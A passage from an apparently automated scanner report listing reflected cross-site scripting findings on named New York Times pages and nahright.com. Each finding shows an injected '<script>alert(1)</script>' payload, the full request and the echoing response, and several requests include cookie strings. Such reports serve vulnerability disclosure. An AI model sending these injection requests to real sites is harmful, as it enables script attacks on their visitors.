3.164. http://movies.nytimes.com/2010/11/12/movies/12tiny.html [ref parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://movies.nytimes.com |
Path: |
/2010/11/12/movies/12tiny.html |
Issue detail
The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5e7b"><script>alert(1)</script>5a75fc2d357 was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12tiny.html?ref=todayspaperf5e7b"><script>alert(1)</script>5a75fc2d357 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:11 GMT Content-type: text/html Content-Length: 73419
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12tiny.html?ref=todayspaperf5e7b"><script>alert(1)</script>5a75fc2d357&pagewanted=print"> ...[SNIP]...
|
3.165. http://movies.nytimes.com/2010/11/12/movies/12unstop.html [hpw parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://movies.nytimes.com |
Path: |
/2010/11/12/movies/12unstop.html |
Issue detail
The value of the hpw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffbd2"><script>alert(1)</script>07947578a14 was submitted in the hpw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12unstop.html?hpwffbd2"><script>alert(1)</script>07947578a14 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:18 GMT Content-type: text/html Content-Length: 74619
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12unstop.html?hpwffbd2"><script>alert(1)</script>07947578a14&pagewanted=print"> ...[SNIP]...
|
3.166. http://movies.nytimes.com/2010/11/12/movies/12unstop.html [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://movies.nytimes.com |
Path: |
/2010/11/12/movies/12unstop.html |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea22b"><script>alert(1)</script>b2be1849c05 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12unstop.html?ea22b"><script>alert(1)</script>b2be1849c05=1 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:01 GMT Content-type: text/html Content-Length: 73539
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12unstop.html?ea22b"><script>alert(1)</script>b2be1849c05=1&pagewanted=print"> ...[SNIP]...
|
3.167. http://movies.nytimes.com/2010/11/12/movies/12unstop.html [ref parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://movies.nytimes.com |
Path: |
/2010/11/12/movies/12unstop.html |
Issue detail
The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63a87"><script>alert(1)</script>e87edf3b78 was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12unstop.html?ref=todayspaper63a87"><script>alert(1)</script>e87edf3b78 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:15 GMT Content-type: text/html Content-Length: 74735
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12unstop.html?ref=todayspaper63a87"><script>alert(1)</script>e87edf3b78&pagewanted=print"> ...[SNIP]...
|
3.168. http://movies.nytimes.com/2010/11/12/movies/12unstop.html [src parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://movies.nytimes.com |
Path: |
/2010/11/12/movies/12unstop.html |
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98e5f"><script>alert(1)</script>7ccb997166a was submitted in the src parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12unstop.html?src=dayp98e5f"><script>alert(1)</script>7ccb997166a HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:11 GMT Content-type: text/html Content-Length: 74106
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12unstop.html?src=dayp98e5f"><script>alert(1)</script>7ccb997166a&pagewanted=print"> ...[SNIP]...
|
3.169. http://movies.nytimes.com/2010/11/13/movies/13sky.html [hpw parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://movies.nytimes.com |
Path: |
/2010/11/13/movies/13sky.html |
Issue detail
The value of the hpw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 221ad"><script>alert(1)</script>f35b5011bda was submitted in the hpw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/13/movies/13sky.html?hpw221ad"><script>alert(1)</script>f35b5011bda HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:34 GMT Content-type: text/html Content-Length: 72211
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/13/movies/13sky.html?hpw221ad"><script>alert(1)</script>f35b5011bda&pagewanted=print"> ...[SNIP]...
|
3.170. http://movies.nytimes.com/2010/11/13/movies/13sky.html [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://movies.nytimes.com |
Path: |
/2010/11/13/movies/13sky.html |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad1ea"><script>alert(1)</script>f474dec4118 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/13/movies/13sky.html?ad1ea"><script>alert(1)</script>f474dec4118=1 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:33 GMT Content-type: text/html Content-Length: 70797
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/13/movies/13sky.html?ad1ea"><script>alert(1)</script>f474dec4118=1&pagewanted=print"> ...[SNIP]...
|
3.171. http://movies.nytimes.com/movie/401469/Unstoppable/overview [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://movies.nytimes.com |
Path: |
/movie/401469/Unstoppable/overview |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba18d"><script>alert(1)</script>494c7d4f0db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /movie/401469/Unstoppable/overview?ba18d"><script>alert(1)</script>494c7d4f0db=1 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:09 GMT Content-type: text/html Content-Length: 43755
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Unstoppable - Trailer - Cast - Showtimes - NYTimes.com </title>
...[SNIP]... <meta name="communityAssetTaxonomy" content="movie//Unstoppable?ba18d"><script>alert(1)</script>494c7d4f0db=1"> ...[SNIP]...
|
3.172. http://nahright.com/news/ [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://nahright.com |
Path: |
/news/ |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a3bf</script><script>alert(1)</script>5635fe9c9d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/?6a3bf</script><script>alert(1)</script>5635fe9c9d9=1 HTTP/1.1 Host: nahright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Set-Cookie: ARPT=PROMIRS192.168.100.41CKOMM; path=/ Date: Sat, 13 Nov 2010 02:08:00 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Vary: Cookie,Accept-Encoding X-Pingback: http://nahright.com/news/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 77592
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/x ...[SNIP]... <script> COMSCORE.beacon({ c1:2, c2:6685975, c3:"", c4:"nahright.com/news/?6a3bf</script><script>alert(1)</script>5635fe9c9d9=1", c5:"", c6:"", c15:"" }); </script> ...[SNIP]...
|
3.173. http://opinionator.blogs.nytimes.com/2010/11/11/a-republican-for-higher-taxes/ [src parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://opinionator.blogs.nytimes.com |
Path: |
/2010/11/11/a-republican-for-higher-taxes/ |
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b51c1"><script>alert(1)</script>380bf182eb4 was submitted in the src parameter. This input was echoed as b51c1\"><script>alert(1)</script>380bf182eb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/11/a-republican-for-higher-taxes/?src=meb51c1"><script>alert(1)</script>380bf182eb4&ref=homepage HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
|
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:09:43 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 X-Pad: avoid browser bug Content-Length: 64109
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... Now1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=politics;law;science;domesticity;banking;the+West+Coast+;david-stockman;deficit;taxes;william-d-cohan&src=meb51c1\"><script>alert(1)</script>380bf182eb4"> ...[SNIP]...
|
3.174. http://opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [src parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://opinionator.blogs.nytimes.com |
Path: |
/2010/11/12/a-deficit-of-respect/ |
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cb5b"><script>alert(1)</script>23c8535c0f2 was submitted in the src parameter. This input was echoed as 1cb5b\"><script>alert(1)</script>23c8535c0f2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/a-deficit-of-respect/?src=twr1cb5b"><script>alert(1)</script>23c8535c0f2 HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
|
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:08:00 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 X-Pad: avoid browser bug Content-Length: 72784
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... CLIENTSIDE&query=qstring&keywords=politics;law;science;domesticity;banking;the+West+Coast+;alan-simpson;budget;erskine-bowles;federal-deficit;health-care-reform;social-security;taxes;the-thread&src=twr1cb5b\"><script>alert(1)</script>23c8535c0f2"> ...[SNIP]...
|
3.175. http://opinionator.blogs.nytimes.com/2010/11/12/the-ways-of-empathy/ [src parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://opinionator.blogs.nytimes.com |
Path: |
/2010/11/12/the-ways-of-empathy/ |
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ea26"><script>alert(1)</script>1e6f397c31 was submitted in the src parameter. This input was echoed as 4ea26\"><script>alert(1)</script>1e6f397c31 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/the-ways-of-empathy/?src=twr4ea26"><script>alert(1)</script>1e6f397c31 HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
|
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:09:43 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 X-Pad: avoid browser bug Content-Length: 71082
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... eft7,Left8,Left9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=politics;law;science;domesticity;banking;the+West+Coast+;bullying;fixes;_featured&src=twr4ea26\"><script>alert(1)</script>1e6f397c31"> ...[SNIP]...
|
3.176. http://opinionator.blogs.nytimes.com/category/alec-soth [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://opinionator.blogs.nytimes.com |
Path: |
/category/alec-soth |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62045"><script>alert(1)</script>d5bdd9c1f68 was submitted in the REST URL parameter 2. This input was echoed as 62045\"><script>alert(1)</script>d5bdd9c1f68 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/alec-soth62045"><script>alert(1)</script>d5bdd9c1f68 HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:22:03 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:22:03 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43778
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/alec-soth62045\"><script>alert(1)</script>d5bdd9c1f68&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.177. http://opinionator.blogs.nytimes.com/category/alec-soth/feed/ [REST URL parameter 3]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://opinionator.blogs.nytimes.com |
Path: |
/category/alec-soth/feed/ |
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bddd1"><script>alert(1)</script>fc7205605c8 was submitted in the REST URL parameter 3. This input was echoed as bddd1\"><script>alert(1)</script>fc7205605c8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/alec-soth/feedbddd1"><script>alert(1)</script>fc7205605c8/ HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:20:01 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:20:01 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43833
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/alec-soth/feedbddd1\"><script>alert(1)</script>fc7205605c8&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.178. http://opinionator.blogs.nytimes.com/category/alec-soth/page/2/ [REST URL parameter 3]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://opinionator.blogs.nytimes.com |
Path: |
/category/alec-soth/page/2/ |
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43912"><script>alert(1)</script>d4a4c69cacb was submitted in the REST URL parameter 3. This input was echoed as 43912\"><script>alert(1)</script>d4a4c69cacb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/alec-soth/page43912"><script>alert(1)</script>d4a4c69cacb/2/ HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:22:44 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:22:44 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43855
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/alec-soth/page43912\"><script>alert(1)</script>d4a4c69cacb/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B, ...[SNIP]...
|
3.179. http://opinionator.blogs.nytimes.com/category/allison-arieff [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://opinionator.blogs.nytimes.com |
Path: |
/category/allison-arieff |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cc60"><script>alert(1)</script>34ddd92904c was submitted in the REST URL parameter 2. This input was echoed as 8cc60\"><script>alert(1)</script>34ddd92904c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
